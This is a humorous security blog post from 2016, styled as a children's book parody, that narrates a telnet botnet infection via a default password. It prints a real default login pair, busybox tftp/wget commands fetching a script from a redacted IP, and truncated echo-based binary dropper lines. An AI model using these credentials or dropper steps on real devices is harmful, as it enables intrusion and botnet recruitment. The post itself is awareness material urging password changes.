Your Fly Is Open

Netmenaces and Other Internet Stupidity

If You Leave a Hacker a Default Password...

2016-06-06 2 min read attacks

In the interest of making security approachable, I’ve decided to attempt to bring proper security methodology down to a level that everyone can understand. Because my four-year-old niece lives with us, we’ve got a ton of children’s books lying around for inspiration. I decided to try passing along a little security knowledge by mimicking the style of the beloved children’s classic, If You Give a Mouse a Cookie.

If you leave a hacker a default password,

An Eeevil Hacker

He’ll use it to log into your telnet server.

He’s in!

Once he’s logged into your telnet server,

host login: root
Password: vizxv

he’ll want to install some new software.

Installing software

He’ll try to download something via TFTP,

# busybox tftp 185.xx.xxx.xxx -c get bin.sh
tftp: applet not found

but that won’t work, so he’ll try WGET.

# busybox wget 185.xx.xxx.xxx -c get bin.sh
wget: applet not found

That won’t work either, so he’ll resort to creating a file all by himself.

# echo -en '\x7f\x45\x4c...\x01\x00\x00\x00\xa4\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
# echo -en '\x01\x00\x34...\x28\x00\x06\x00\x05\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV
.
.
.
# echo -en '\x00\x00\x00...\x01\x00\x00\x00\x00\x00' >> retrieve && echo -en '\x52\x43\x56'
RCV

Once he’s created that file, he’ll want to run it.

He want’s to run it

Once its running, it’ll download another one of the hacker’s files.

Downloading

He’ll want to run that one too.

He want’s to run that one too…

Once it’s running, it will start attacking other systems on the Internet.

Attack!

While its attacking other systems on the Internet, it might come across Tom’s Telnet Mirror™.

Cat attacking mirror

If the code attacks Tom’s Telnet Mirror™, it’ll redirect the attack right back to your system.

Bounce!

And, chances are, if the attack is reflected right back to your system, it’ll probably try logging in using a default password.

host login: root
Password: vizxv

With apologies to Laura Numeroff
If you have young’uns, seriously consider buying the original… they’ll love it.
And for Pete’s sake… change those frickin’ passwords, mmmmkay?

-TL
Tom Liston
Owner, Principal Consultant
Bad Wolf Security, LLC
Mastodon: @tliston@infosec.exchange
Twitter: @tliston
June 6, 2016